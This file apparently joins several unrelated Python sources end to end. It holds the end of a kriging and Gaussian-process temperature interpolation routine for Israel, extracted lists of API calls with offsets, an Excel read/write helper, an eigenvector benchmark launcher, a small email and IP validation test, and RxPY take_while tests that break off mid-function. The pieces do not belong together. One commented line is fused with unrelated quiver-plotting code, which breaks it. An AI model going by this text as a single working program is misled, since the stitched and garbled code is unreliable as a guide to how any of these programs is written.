## variogram_model='linear', verbose=False,
## enable_plotting=False)
# model.X_ORIG = X_train[:, 0]
# model.X_ADJUSTED = model.X_ORIG
# model.Y_ORIG = X_train[:, 1]
# model.Y_ADJUSTED = model.Y_ORIG
# model.Z = y_train
# y_pred, ss = model.execute('points', X_test[0, 0],
# X_test[0, 1])
# # there is only one y-test and y-pred per iteration over the loo.split,
# # so to get a proper graph, we append them to respective lists.
# ytests += list(y_test) cmap = plt.get_cmap('spring', 10)
Q = ax.quiver(isr['X'], isr['Y'], isr['U'], isr['V'],
isr['cm_per_year'], cmap=cmap)
fig.colorbar(Q, extend='max')
# ypreds += list(y_pred)
# true_vals = np.array(ytests)
# predicted = np.array(ypreds)
# r2 = metrics.r2_score(ytests, ypreds)
# ms_error = metrics.mean_squared_error(ytests, ypreds)
# print("R^2: {:.5f}%, MSE: {:.5f}".format(r2*100, ms_error))
# cv_results = cross_validate(gp, X, y, cv=cv, scoring='mean_squared_error',
# return_train_score=True, n_jobs=-1)
# test = xr.DataArray(cv_results['test_score'], dims=['kfold'])
# train = xr.DataArray(cv_results['train_score'], dims=['kfold'])
# train.name = 'train'
# cds = test.to_dataset(name='test')
# cds['train'] = train
# cds['kfold'] = np.arange(len(cv_results['test_score'])) + 1
# cds['mean_train'] = cds.train.mean('kfold')
# cds['mean_test'] = cds.test.mean('kfold')
# interpolated=griddata(X, y, (rr, cc), method='nearest')
model.fit(X, y)
interpolated = model.predict(rr_cc_as_cols).reshape(da.values.shape)
da_inter = da.copy(data=interpolated)
if lapse_rate is not None and var == 'TD':
da_inter -= lapse_rate * awd / 1000.0
if (rms is not None and cv is None): # or (rms is not None and not u):
predicted = []
true_vals = []
for i, row in geo_snap.iterrows():
lat = da.sel(lat=row['lat'], method='nearest').lat.values
lon = da.sel(lon=row['lon'], method='nearest').lon.values
pred = da_inter.loc[{'lat': lat, 'lon': lon}].values.item()
true = row[var]
predicted.append(pred)
true_vals.append(true)
predicted = np.array(predicted)
true_vals = np.array(true_vals)
ms_error = mean_squared_error(true_vals, predicted)
print("MSE: {:.5f}".format(ms_error))
if plot:
import salem
from salem import DataLevels, Map
import cartopy.crs as ccrs
# import cartopy.io.shapereader as shpreader
import matplotlib.pyplot as plt
# fname = gis_path / 'ne_10m_admin_0_sovereignty.shp'
# fname = gis_path / 'gadm36_ISR_0.shp'
# ax = plt.axes(projection=ccrs.PlateCarree())
f, ax = plt.subplots(figsize=(6, 10))
# shdf = salem.read_shapefile(salem.get_demo_file('world_borders.shp'))
shdf = salem.read_shapefile(gis_path / 'Israel_and_Yosh.shp')
# shdf = shdf.loc[shdf['CNTRY_NAME'] == 'Israel'] # remove other countries
shdf.crs = {'init': 'epsg:4326'}
dsr = da_inter.salem.roi(shape=shdf)
grid = dsr.salem.grid
grid = da_inter.salem.grid
sm = Map(grid)
# sm.set_shapefile(gis_path / 'Israel_and_Yosh.shp')
# sm = dsr.salem.quick_map(ax=ax)
# sm2 = salem.Map(grid, factor=1)
# sm2.set_shapefile(gis_path/'gis_osm_water_a_free_1.shp',
# edgecolor='k')
sm.set_data(dsr)
# sm.set_nlevels(7)
# sm.visualize(ax=ax, title='Israel {} interpolated temperature from IMS'.format(method),
# cbar_title='degC')
sm.set_shapefile(gis_path/'gis_osm_water_a_free_1.shp',
edgecolor='k') # , facecolor='aqua')
# sm.set_topography(awd.values, crs=awd.crs)
# sm.set_rgb(crs=shdf.crs, natural_earth='hr') # ad
# lakes = salem.read_shapefile(gis_path/'gis_osm_water_a_free_1.shp')
sm.set_cmap(cm='rainbow')
sm.visualize(ax=ax, title='Israel {} interpolated temperature from IMS'.format(method),
cbar_title='degC')
dl = DataLevels(geo_snap[var], levels=sm.levels)
dl.set_cmap(sm.cmap)
x, y = sm.grid.transform(geo_snap.lon.values, geo_snap.lat.values)
ax.scatter(x, y, color=dl.to_rgb(), s=20, edgecolors='k', linewidths=0.5)
suptitle = time.replace('T', ' ')
f.suptitle(suptitle, fontsize=14, fontweight='bold')
if (rms is not None or cv is not None) and (not gridsearch):
import seaborn as sns
f, ax = plt.subplots(1, 2, figsize=(12, 6))
sns.scatterplot(x=true_vals, y=predicted, ax=ax[0], marker='.',
s=100)
resid = predicted - true_vals
sns.distplot(resid, bins=5, color='c', label='residuals',
ax=ax[1])
rmean = np.mean(resid)
rstd = np.std(resid)
rmedian = np.median(resid)
rmse = np.sqrt(mean_squared_error(true_vals, predicted))
plt.axvline(rmean, color='r', linestyle='dashed', linewidth=1)
_, max_ = plt.ylim()
plt.text(rmean + rmean / 10, max_ - max_ / 10,
'Mean: {:.2f}, RMSE: {:.2f}'.format(rmean, rmse))
f.tight_layout()
# lakes.plot(ax=ax, color='b', edgecolor='k')
# lake_borders = gpd.overlay(countries, capitals, how='difference')
# adm1_shapes = list(shpreader.Reader(fname).geometries())
# ax = plt.axes(projection=ccrs.PlateCarree())
# ax.coastlines(resolution='10m')
# ax.add_geometries(adm1_shapes, ccrs.PlateCarree(),
# edgecolor='black', facecolor='gray', alpha=0.5)
# da_inter.plot.pcolormesh('lon', 'lat', ax=ax)
#geo_snap.plot(ax=ax, column=var, cmap='viridis', edgecolor='black',
# legend=False)
return da_inter
|
[
"numpy.abs",
"numpy.polyfit",
"sklearn.metrics.r2_score",
"numpy.isnan",
"seaborn.regplot",
"numpy.mean",
"numpy.arange",
"numpy.exp",
"aux_gps.coarse_dem",
"salem.read_shapefile",
"sklearn.model_selection.RepeatedKFold",
"pandas.DataFrame",
"matplotlib.pyplot.axvline",
"numpy.meshgrid",
"numpy.std",
"xarray.merge",
"matplotlib.pyplot.subplots",
"sklearn.gaussian_process.GaussianProcessRegressor",
"sklearn.metrics.mean_squared_error",
"salem.Map",
"aux_gps.keep_iqr",
"seaborn.scatterplot",
"numpy.median",
"matplotlib.pyplot.ylim",
"sklearn.gaussian_process.kernels.RBF",
"sklearn.gaussian_process.kernels.RationalQuadratic",
"pandas.to_datetime",
"aux_gps.linear_fit_using_scipy_da_ts",
"sklearn.gaussian_process.kernels.WhiteKernel",
"sklearn.svm.SVR",
"sklearn.neighbors.KNeighborsRegressor",
"numpy.log",
"sklearn.model_selection.KFold",
"sklearn.model_selection.LeaveOneOut",
"pykrige.rk.Krige",
"pyproj.Proj",
"xarray.DataArray",
"numpy.array",
"numpy.column_stack",
"seaborn.distplot",
"salem.DataLevels",
"pyproj.transform",
"xarray.load_dataset"
] |
[((515, 529), 'pandas.DataFrame', 'pd.DataFrame', ([], {}), '()\n', (527, 529), True, 'import pandas as pd\n'), ((1408, 1438), 'pandas.to_datetime', 'pd.to_datetime', (["df['datetime']"], {}), "(df['datetime'])\n", (1422, 1438), True, 'import pandas as pd\n'), ((2602, 2656), 'xarray.load_dataset', 'xr.load_dataset', (["(ims_path / 'IMS_BP_israeli_10mins.nc')"], {}), "(ims_path / 'IMS_BP_israeli_10mins.nc')\n", (2617, 2656), True, 'import xarray as xr\n'), ((2706, 2719), 'xarray.merge', 'xr.merge', (['bps'], {}), '(bps)\n', (2714, 2719), True, 'import xarray as xr\n'), ((2903, 2988), 'aux_gps.linear_fit_using_scipy_da_ts', 'linear_fit_using_scipy_da_ts', (['mean_p'], {'model': 'model', 'slope_factor': '(1)', 'not_time': '(True)'}), '(mean_p, model=model, slope_factor=1, not_time=True\n )\n', (2931, 2988), False, 'from aux_gps import linear_fit_using_scipy_da_ts\n'), ((3999, 4010), 'numpy.log', 'np.log', (['hda'], {}), '(hda)\n', (4005, 4010), True, 'import numpy as np\n'), ((4102, 4188), 'aux_gps.linear_fit_using_scipy_da_ts', 'linear_fit_using_scipy_da_ts', (['log_hda'], {'model': 'model', 'slope_factor': '(1)', 'not_time': '(True)'}), '(log_hda, model=model, slope_factor=1, not_time\n =True)\n', (4130, 4188), False, 'from aux_gps import linear_fit_using_scipy_da_ts\n'), ((4225, 4253), 'numpy.exp', 'np.exp', (["results['intercept']"], {}), "(results['intercept'])\n", (4231, 4253), True, 'import numpy as np\n'), ((6132, 6149), 'numpy.meshgrid', 'np.meshgrid', (['r', 'c'], {}), '(r, c)\n', (6143, 6149), True, 'import numpy as np\n'), ((6190, 6227), 'numpy.column_stack', 'np.column_stack', (['[rr[vals], cc[vals]]'], {}), '([rr[vals], cc[vals]])\n', (6205, 6227), True, 'import numpy as np\n'), ((6363, 6430), 'pykrige.rk.Krige', 'Krige', ([], {'method': '"""ordinary"""', 'variogram_model': '"""spherical"""', 'verbose': '(True)'}), "(method='ordinary', variogram_model='spherical', verbose=True)\n", (6368, 6430), False, 'from pykrige.rk import Krige\n'), ((7682, 7734), 'numpy.arange', 'np.arange', (['lats[0]', 'lats[1]', '(1.0 / points_per_degree)'], {}), '(lats[0], lats[1], 1.0 / points_per_degree)\n', (7691, 7734), True, 'import numpy as np\n'), ((7745, 7797), 'numpy.arange', 'np.arange', (['lons[0]', 'lons[1]', '(1.0 / points_per_degree)'], {}), '(lons[0], lons[1], 1.0 / points_per_degree)\n', (7754, 7797), True, 'import numpy as np\n'), ((7857, 7896), 'xarray.DataArray', 'xr.DataArray', (['nans'], {'dims': "['lat', 'lon']"}), "(nans, dims=['lat', 'lon'])\n", (7869, 7896), True, 'import xarray as xr\n'), ((9074, 9131), 'pyproj.Proj', 'pyproj.Proj', ([], {'proj': '"""latlong"""', 'ellps': '"""WGS84"""', 'datum': '"""WGS84"""'}), "(proj='latlong', ellps='WGS84', datum='WGS84')\n", (9085, 9131), False, 'import pyproj\n'), ((9143, 9200), 'pyproj.Proj', 'pyproj.Proj', ([], {'proj': '"""geocent"""', 'ellps': '"""WGS84"""', 'datum': '"""WGS84"""'}), "(proj='geocent', ellps='WGS84', datum='WGS84')\n", (9154, 9200), False, 'import pyproj\n'), ((10172, 10186), 'aux_gps.coarse_dem', 'coarse_dem', (['da'], {}), '(da)\n', (10182, 10186), False, 'from aux_gps import coarse_dem\n'), ((11919, 11936), 'numpy.meshgrid', 'np.meshgrid', (['r', 'c'], {}), '(r, c)\n', (11930, 11936), True, 'import numpy as np\n'), ((2668, 2683), 'aux_gps.keep_iqr', 'keep_iqr', (['bp[x]'], {}), '(bp[x])\n', (2676, 2683), False, 'from aux_gps import keep_iqr\n'), ((3125, 3139), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (3137, 3139), True, 'import matplotlib.pyplot as plt\n'), ((4277, 4300), 'numpy.exp', 'np.exp', (["(-hda['alt'] / H)"], {}), "(-hda['alt'] / H)\n", (4283, 4300), True, 'import numpy as np\n'), ((4332, 4346), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (4344, 4346), True, 'import matplotlib.pyplot as plt\n'), ((5096, 5117), 'numpy.exp', 'np.exp', (['(hdf.index / H)'], {}), '(hdf.index / H)\n', (5102, 5117), True, 'import numpy as np\n'), ((6162, 6181), 'numpy.isnan', 'np.isnan', (['da.values'], {}), '(da.values)\n', (6170, 6181), True, 'import numpy as np\n'), ((6680, 6713), 'aux_gps.coarse_dem', 'coarse_dem', (['da'], {'dem_path': 'dem_path'}), '(da, dem_path=dem_path)\n', (6690, 6713), False, 'from aux_gps import coarse_dem\n'), ((6755, 6777), 'numpy.exp', 'np.exp', (['(-1.0 * awd / H)'], {}), '(-1.0 * awd / H)\n', (6761, 6777), True, 'import numpy as np\n'), ((7088, 7133), 'numpy.column_stack', 'np.column_stack', (['[predict_lons, predict_lats]'], {}), '([predict_lons, predict_lats])\n', (7103, 7133), True, 'import numpy as np\n'), ((10321, 10381), 'numpy.polyfit', 'np.polyfit', (["geo_snap['alt'].values", "geo_snap['TD'].values", '(1)'], {}), "(geo_snap['alt'].values, geo_snap['TD'].values, 1)\n", (10331, 10381), True, 'import numpy as np\n'), ((10481, 10510), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(10, 6)'}), '(figsize=(10, 6))\n', (10493, 10510), True, 'import matplotlib.pyplot as plt\n'), ((10519, 10618), 'seaborn.regplot', 'sns.regplot', ([], {'data': 'geo_snap', 'x': '"""alt"""', 'y': '"""TD"""', 'color': '"""r"""', 'scatter_kws': "{'color': 'b'}", 'ax': 'ax_lapse'}), "(data=geo_snap, x='alt', y='TD', color='r', scatter_kws={'color':\n 'b'}, ax=ax_lapse)\n", (10530, 10618), True, 'import seaborn as sns\n'), ((11949, 11968), 'numpy.isnan', 'np.isnan', (['da.values'], {}), '(da.values)\n', (11957, 11968), True, 'import numpy as np\n'), ((12126, 12156), 'numpy.column_stack', 'np.column_stack', (['[Xrr, Ycc, Z]'], {}), '([Xrr, Ycc, Z])\n', (12141, 12156), True, 'import numpy as np\n'), ((12178, 12240), 'pyproj.transform', 'pyproj.transform', (['lla', 'ecef', 'rr', 'cc', 'awd.values'], {'radians': '(False)'}), '(lla, ecef, rr, cc, awd.values, radians=False)\n', (12194, 12240), False, 'import pyproj\n'), ((12385, 12422), 'numpy.column_stack', 'np.column_stack', (['[rr[vals], cc[vals]]'], {}), '([rr[vals], cc[vals]])\n', (12400, 12422), True, 'import numpy as np\n'), ((12897, 13010), 'sklearn.gaussian_process.GaussianProcessRegressor', 'GaussianProcessRegressor', ([], {'alpha': '(0.0)', 'kernel': 'kernel', 'n_restarts_optimizer': '(5)', 'random_state': '(42)', 'normalize_y': '(True)'}), '(alpha=0.0, kernel=kernel, n_restarts_optimizer=5,\n random_state=42, normalize_y=True)\n', (12921, 13010), False, 'from sklearn.gaussian_process import GaussianProcessRegressor\n'), ((15835, 15851), 'numpy.array', 'np.array', (['ytests'], {}), '(ytests)\n', (15843, 15851), True, 'import numpy as np\n'), ((15872, 15888), 'numpy.array', 'np.array', (['ypreds'], {}), '(ypreds)\n', (15880, 15888), True, 'import numpy as np\n'), ((15902, 15934), 'sklearn.metrics.r2_score', 'metrics.r2_score', (['ytests', 'ypreds'], {}), '(ytests, ypreds)\n', (15918, 15934), False, 'from sklearn import metrics\n'), ((15954, 15996), 'sklearn.metrics.mean_squared_error', 'metrics.mean_squared_error', (['ytests', 'ypreds'], {}), '(ytests, ypreds)\n', (15980, 15996), False, 'from sklearn import metrics\n'), ((19777, 19796), 'numpy.array', 'np.array', (['predicted'], {}), '(predicted)\n', (19785, 19796), True, 'import numpy as np\n'), ((19817, 19836), 'numpy.array', 'np.array', (['true_vals'], {}), '(true_vals)\n', (19825, 19836), True, 'import numpy as np\n'), ((19856, 19896), 'sklearn.metrics.mean_squared_error', 'mean_squared_error', (['true_vals', 'predicted'], {}), '(true_vals, predicted)\n', (19874, 19896), False, 'from sklearn.metrics import mean_squared_error\n'), ((20328, 20357), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(6, 10)'}), '(figsize=(6, 10))\n', (20340, 20357), True, 'import matplotlib.pyplot as plt\n'), ((20453, 20507), 'salem.read_shapefile', 'salem.read_shapefile', (["(gis_path / 'Israel_and_Yosh.shp')"], {}), "(gis_path / 'Israel_and_Yosh.shp')\n", (20473, 20507), False, 'import salem\n'), ((20756, 20765), 'salem.Map', 'Map', (['grid'], {}), '(grid)\n', (20759, 20765), False, 'from salem import DataLevels, Map\n'), ((21712, 21755), 'salem.DataLevels', 'DataLevels', (['geo_snap[var]'], {'levels': 'sm.levels'}), '(geo_snap[var], levels=sm.levels)\n', (21722, 21755), False, 'from salem import DataLevels, Map\n'), ((7461, 7495), 'numpy.exp', 'np.exp', (["(-1.0 * df_inter['alt'] / H)"], {}), "(-1.0 * df_inter['alt'] / H)\n", (7467, 7495), True, 'import numpy as np\n'), ((9611, 9635), 'sklearn.model_selection.KFold', 'KFold', ([], {'n_splits': 'n_splits'}), '(n_splits=n_splits)\n', (9616, 9635), False, 'from sklearn.model_selection import KFold\n'), ((9899, 9969), 'sklearn.model_selection.RepeatedKFold', 'RepeatedKFold', ([], {'n_splits': 'n_splits', 'n_repeats': 'n_repeats', 'random_state': '(42)'}), '(n_splits=n_splits, n_repeats=n_repeats, random_state=42)\n', (9912, 9969), False, 'from sklearn.model_selection import RepeatedKFold\n'), ((10053, 10066), 'sklearn.model_selection.LeaveOneOut', 'LeaveOneOut', ([], {}), '()\n', (10064, 10066), False, 'from sklearn.model_selection import LeaveOneOut\n'), ((12083, 12097), 'numpy.array', 'np.array', (['alts'], {}), '(alts)\n', (12091, 12097), True, 'import numpy as np\n'), ((12794, 12857), 'sklearn.gaussian_process.kernels.WhiteKernel', 'WhiteKernel', ([], {'noise_level': '(0.01)', 'noise_level_bounds': '(1e-10, 10.0)'}), '(noise_level=0.01, noise_level_bounds=(1e-10, 10.0))\n', (12805, 12857), False, 'from sklearn.gaussian_process.kernels import WhiteKernel\n'), ((13405, 13518), 'sklearn.gaussian_process.GaussianProcessRegressor', 'GaussianProcessRegressor', ([], {'alpha': '(0.0)', 'kernel': 'kernel', 'n_restarts_optimizer': '(5)', 'random_state': '(42)', 'normalize_y': '(True)'}), '(alpha=0.0, kernel=kernel, n_restarts_optimizer=5,\n random_state=42, normalize_y=True)\n', (13429, 13518), False, 'from sklearn.gaussian_process import GaussianProcessRegressor\n'), ((16447, 16454), 'pykrige.rk.Krige', 'Krige', ([], {}), '()\n', (16452, 16454), False, 'from pykrige.rk import Krige\n'), ((22168, 22203), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(1)', '(2)'], {'figsize': '(12, 6)'}), '(1, 2, figsize=(12, 6))\n', (22180, 22203), True, 'import matplotlib.pyplot as plt\n'), ((22216, 22286), 'seaborn.scatterplot', 'sns.scatterplot', ([], {'x': 'true_vals', 'y': 'predicted', 'ax': 'ax[0]', 'marker': '"""."""', 's': '(100)'}), "(x=true_vals, y=predicted, ax=ax[0], marker='.', s=100)\n", (22231, 22286), True, 'import seaborn as sns\n'), ((22369, 22436), 'seaborn.distplot', 'sns.distplot', (['resid'], {'bins': '(5)', 'color': '"""c"""', 'label': '"""residuals"""', 'ax': 'ax[1]'}), "(resid, bins=5, color='c', label='residuals', ax=ax[1])\n", (22381, 22436), True, 'import seaborn as sns\n'), ((22482, 22496), 'numpy.mean', 'np.mean', (['resid'], {}), '(resid)\n', (22489, 22496), True, 'import numpy as np\n'), ((22516, 22529), 'numpy.std', 'np.std', (['resid'], {}), '(resid)\n', (22522, 22529), True, 'import numpy as np\n'), ((22552, 22568), 'numpy.median', 'np.median', (['resid'], {}), '(resid)\n', (22561, 22568), True, 'import numpy as np\n'), ((22650, 22712), 'matplotlib.pyplot.axvline', 'plt.axvline', (['rmean'], {'color': '"""r"""', 'linestyle': '"""dashed"""', 'linewidth': '(1)'}), "(rmean, color='r', linestyle='dashed', linewidth=1)\n", (22661, 22712), True, 'import matplotlib.pyplot as plt\n'), ((22735, 22745), 'matplotlib.pyplot.ylim', 'plt.ylim', ([], {}), '()\n', (22743, 22745), True, 'import matplotlib.pyplot as plt\n'), ((10440, 10449), 'numpy.abs', 'np.abs', (['a'], {}), '(a)\n', (10446, 10449), True, 'import numpy as np\n'), ((12722, 12780), 'sklearn.gaussian_process.kernels.RBF', 'RBF', ([], {'length_scale': '(0.25)', 'length_scale_bounds': '(0.01, 1000.0)'}), '(length_scale=0.25, length_scale_bounds=(0.01, 1000.0))\n', (12725, 12780), False, 'from sklearn.gaussian_process.kernels import RBF\n'), ((13271, 13308), 'sklearn.gaussian_process.kernels.RationalQuadratic', 'RationalQuadratic', ([], {'length_scale': '(100.0)'}), '(length_scale=100.0)\n', (13288, 13308), False, 'from sklearn.gaussian_process.kernels import RationalQuadratic\n'), ((13325, 13388), 'sklearn.gaussian_process.kernels.WhiteKernel', 'WhiteKernel', ([], {'noise_level': '(0.01)', 'noise_level_bounds': '(1e-10, 10.0)'}), '(noise_level=0.01, noise_level_bounds=(1e-10, 10.0))\n', (13336, 13388), False, 'from sklearn.gaussian_process.kernels import WhiteKernel\n'), ((13639, 13693), 'sklearn.neighbors.KNeighborsRegressor', 'KNeighborsRegressor', ([], {'n_neighbors': '(5)', 'weights': '"""distance"""'}), "(n_neighbors=5, weights='distance')\n", (13658, 13693), False, 'from sklearn.neighbors import KNeighborsRegressor\n'), ((22596, 22636), 'sklearn.metrics.mean_squared_error', 'mean_squared_error', (['true_vals', 'predicted'], {}), '(true_vals, predicted)\n', (22614, 22636), False, 'from sklearn.metrics import mean_squared_error\n'), ((13736, 13899), 'sklearn.svm.SVR', 'SVR', ([], {'C': '(1.0)', 'cache_size': '(200)', 'coef0': '(0.0)', 'degree': '(3)', 'epsilon': '(0.1)', 'gamma': '"""auto_deprecated"""', 'kernel': '"""rbf"""', 'max_iter': '(-1)', 'shrinking': '(True)', 'tol': '(0.001)', 'verbose': '(False)'}), "(C=1.0, cache_size=200, coef0=0.0, degree=3, epsilon=0.1, gamma=\n 'auto_deprecated', kernel='rbf', max_iter=-1, shrinking=True, tol=0.001,\n verbose=False)\n", (13739, 13899), False, 'from sklearn.svm import SVR\n'), ((13975, 14042), 'pykrige.rk.Krige', 'Krige', ([], {'method': '"""ordinary"""', 'variogram_model': '"""spherical"""', 'verbose': '(True)'}), "(method='ordinary', variogram_model='spherical', verbose=True)\n", (13980, 14042), False, 'from pykrige.rk import Krige\n'), ((14109, 14174), 'pykrige.rk.Krige', 'Krige', ([], {'method': '"""universal"""', 'variogram_model': '"""linear"""', 'verbose': '(True)'}), "(method='universal', variogram_model='linear', verbose=True)\n", (14114, 14174), False, 'from pykrige.rk import Krige\n')]
|
# coding=utf-8
__author__ = 'zouxin'
import xlrd
import xlwt
class xlsUtil:
heading_xf = xlwt.easyxf('font: bold on; align:wrap on, vert centre, horiz center')
@staticmethod
def write_xls(sheet_name, headings, data):
heading_xf = xlsUtil.heading_xf
# data_xfs = [WriteXLSUtil.kind_to_xf_map[k] for k in WriteXLSUtil.kinds]
rowx = 0
for colx, value in enumerate(headings):
sheet_name.write(rowx, colx, value, heading_xf)
sheet_name.set_panes_frozen(True) # frozenheadings instead of split panes
sheet_name.set_horz_split_pos(rowx + 1) # ingeneral, freeze after last heading row
sheet_name.set_remove_splits(True) # if userdoes unfreeze, don't leave a split there
for row in data:
rowx += 1
for colx, value in enumerate(row):
# print ("row = {} col = {} value = {}".format(rowx, colx, value))
sheet_name.write(rowx, colx, value)
@staticmethod
def read_xls(file_name, sheet_name):
data = xlrd.open_workbook(file_name)
tabel = data.sheet_by_name(sheet_name)
rows, cols = tabel.nrows, tabel.ncols
head = tabel.row_values(0)
data = [tabel.row_values(row) for row in range(1, rows)]
return head, data
|
[
"xlrd.open_workbook",
"xlwt.easyxf"
] |
[((98, 168), 'xlwt.easyxf', 'xlwt.easyxf', (['"""font: bold on; align:wrap on, vert centre, horiz center"""'], {}), "('font: bold on; align:wrap on, vert centre, horiz center')\n", (109, 168), False, 'import xlwt\n'), ((1062, 1091), 'xlrd.open_workbook', 'xlrd.open_workbook', (['file_name'], {}), '(file_name)\n', (1080, 1091), False, 'import xlrd\n')]
|
"""Execute time benchmarks in a separate python session for each config."""
import os
from typing import Iterable, Tuple
from run_time_evecs import __name__ as SCRIPT
from run_time_evecs import get_output_file
from shared import layerwise_group, one_group
from shared_call import run
from shared_evecs import (
frac_batch_exact,
frac_batch_mc,
full_batch_exact,
full_batch_mc,
)
from exp.utils.deepobs import (
cifar10_3c3d,
cifar10_resnet32,
cifar10_resnet56,
cifar100_allcnnc,
fmnist_2c2d,
)
# Define settings
computations_cases = [
full_batch_exact.__name__,
full_batch_mc.__name__,
frac_batch_exact.__name__,
frac_batch_mc.__name__,
]
param_groups_cases = [
one_group.__name__,
layerwise_group.__name__,
]
architecture_cases = [
cifar10_3c3d.__name__,
fmnist_2c2d.__name__,
cifar100_allcnnc.__name__,
cifar10_resnet32.__name__,
cifar10_resnet56.__name__,
]
device_cases = ["cuda", "cpu"]
batch_sizes = {
cifar10_3c3d.__name__: "128",
fmnist_2c2d.__name__: "128",
cifar100_allcnnc.__name__: "64",
cifar10_resnet32.__name__: "128",
cifar10_resnet56.__name__: "128",
}
K_MAX = 10
def configurations_no_k() -> Iterable[Tuple[str, str, str, str, str]]:
"""Yield all configurations without looping over k."""
for architecture in architecture_cases:
N = batch_sizes[architecture]
for device in device_cases:
for param_groups in param_groups_cases:
for computations in computations_cases:
yield N, architecture, device, param_groups, computations
def configurations() -> Iterable[Tuple[str, str, str, str, str, str]]:
"""Yield all configurations."""
for N, architecture, device, param_groups, computations in configurations_no_k():
for K in range(1, K_MAX + 1):
yield N, architecture, device, param_groups, computations, str(K)
if __name__ == "__main__":
# Launch eigenpair run time benchmark which creates an output file
for N, architecture, device, param_groups, computations, K in configurations():
DATA_FILE = get_output_file(
architecture, device, param_groups, computations, N, K
)
if os.path.exists(DATA_FILE):
print(
"[exp10] Skipping computation. "
+ f"Output file already exists: {DATA_FILE}"
)
continue
print(
f"\narchitecture = {architecture}\n"
+ f"param_groups = {param_groups}\n"
+ f"computations = {computations}\n"
+ f"device = {device}\n"
+ f"N = {N}\n"
+ f"K = {K}\n"
)
cmd = [
"python",
f"{SCRIPT}.py",
N,
device,
architecture,
param_groups,
computations,
K,
]
run(cmd)
|
[
"shared_call.run",
"os.path.exists",
"run_time_evecs.get_output_file"
] |
[((2137, 2208), 'run_time_evecs.get_output_file', 'get_output_file', (['architecture', 'device', 'param_groups', 'computations', 'N', 'K'], {}), '(architecture, device, param_groups, computations, N, K)\n', (2152, 2208), False, 'from run_time_evecs import get_output_file\n'), ((2242, 2267), 'os.path.exists', 'os.path.exists', (['DATA_FILE'], {}), '(DATA_FILE)\n', (2256, 2267), False, 'import os\n'), ((2939, 2947), 'shared_call.run', 'run', (['cmd'], {}), '(cmd)\n', (2942, 2947), False, 'from shared_call import run\n')]
|
# -*- coding: utf-8 -*-
import data_quality_controller as controller
def test_check_email():
assert controller.check_email("<EMAIL>") is True
assert controller.check_email("totododo") is False
def test_check_ip():
assert controller.check_ip("192.168.127.12") is True
assert controller.check_ip("130.xx.82.195") is False
def test_full_check():
data = {
"id": 1,
"first_name": "barthel",
"last_name": "kittel",
"email": "<EMAIL>",
"gender": "Male",
"ip_address": "192.168.127.12",
"date": "06/05/2018",
"country": "france"
}
expected = {
"id": None,
"first_name": None,
"last_name": None,
"email": True,
"gender": None,
"ip_address": True,
"date": None,
"country": None
}
assert expected == controller.perform_full_check(data)
|
[
"data_quality_controller.perform_full_check",
"data_quality_controller.check_email",
"data_quality_controller.check_ip"
] |
[((106, 139), 'data_quality_controller.check_email', 'controller.check_email', (['"""<EMAIL>"""'], {}), "('<EMAIL>')\n", (128, 139), True, 'import data_quality_controller as controller\n'), ((159, 193), 'data_quality_controller.check_email', 'controller.check_email', (['"""totododo"""'], {}), "('totododo')\n", (181, 193), True, 'import data_quality_controller as controller\n'), ((237, 274), 'data_quality_controller.check_ip', 'controller.check_ip', (['"""192.168.127.12"""'], {}), "('192.168.127.12')\n", (256, 274), True, 'import data_quality_controller as controller\n'), ((294, 330), 'data_quality_controller.check_ip', 'controller.check_ip', (['"""130.xx.82.195"""'], {}), "('130.xx.82.195')\n", (313, 330), True, 'import data_quality_controller as controller\n'), ((859, 894), 'data_quality_controller.perform_full_check', 'controller.perform_full_check', (['data'], {}), '(data)\n', (888, 894), True, 'import data_quality_controller as controller\n')]
|
import unittest
import rx
from rx import operators as ops
from rx.testing import TestScheduler, ReactiveTest, is_prime
on_next = ReactiveTest.on_next
on_completed = ReactiveTest.on_completed
on_error = ReactiveTest.on_error
subscribe = ReactiveTest.subscribe
subscribed = ReactiveTest.subscribed
disposed = ReactiveTest.disposed
created = ReactiveTest.created
class TestTakeWhile(unittest.TestCase):
def test_take_while_complete_Before(self):
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(90, -1), on_next(110, -1), on_next(210, 2), on_next(260, 5), on_next(290, 13), on_next(
320, 3), on_completed(330), on_next(350, 7), on_next(390, 4), on_next(410, 17), on_next(450, 8), on_next(500, 23), on_completed(600))
invoked = 0
def factory():
def predicate(x):
nonlocal invoked
invoked += 1
return is_prime(x)
return xs.pipe(ops.take_while(predicate))
results = scheduler.start(factory)
assert results.messages == [on_next(210, 2), on_next(
260, 5), on_next(290, 13), on_next(320, 3), on_completed(330)]
assert xs.subscriptions == [subscribe(200, 330)]
assert(invoked == 4)
def test_take_while_complete_after(self):
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(90, -1), on_next(110, -1), on_next(210, 2), on_next(260, 5), on_next(290, 13), on_next(
320, 3), on_next(350, 7), on_next(390, 4), on_next(410, 17), on_next(450, 8), on_next(500, 23), on_completed(600))
invoked = 0
def factory():
def predicate(x):
nonlocal invoked
invoked += 1
return is_prime(x)
return xs.pipe(ops.take_while(predicate))
results = scheduler.start(factory)
assert results.messages == [on_next(210, 2), on_next(260, 5), on_next(
290, 13), on_next(320, 3), on_next(350, 7), on_completed(390)]
assert xs.subscriptions == [subscribe(200, 390)]
assert(invoked == 6)
def test_take_while_error_before(self):
ex = 'ex'
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(90, -1), on_next(110, -1), on_next(210, 2), on_next(260, 5), on_error(
270, ex), on_next(290, 13), on_next(320, 3), on_next(350, 7), on_next(390, 4), on_next(410, 17), on_next(450, 8), on_next(500, 23))
invoked = 0
def factory():
def predicate(x):
nonlocal invoked
invoked += 1
return is_prime(x)
return xs.pipe(ops.take_while(predicate))
results = scheduler.start(factory)
assert results.messages == [on_next(210, 2), on_next(260, 5), on_error(270, ex)]
assert xs.subscriptions == [subscribe(200, 270)]
assert(invoked == 2)
def test_take_while_error_after(self):
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_next(90, -1), on_next(110, -1), on_next(210, 2), on_next(260, 5), on_next(290, 13), on_next(
320, 3), on_next(350, 7), on_next(390, 4), on_next(410, 17), on_next(450, 8), on_next(500, 23), on_error(600, 'ex'))
invoked = 0
def factory():
def predicate(x):
nonlocal invoked
invoked += 1
return is_prime(x)
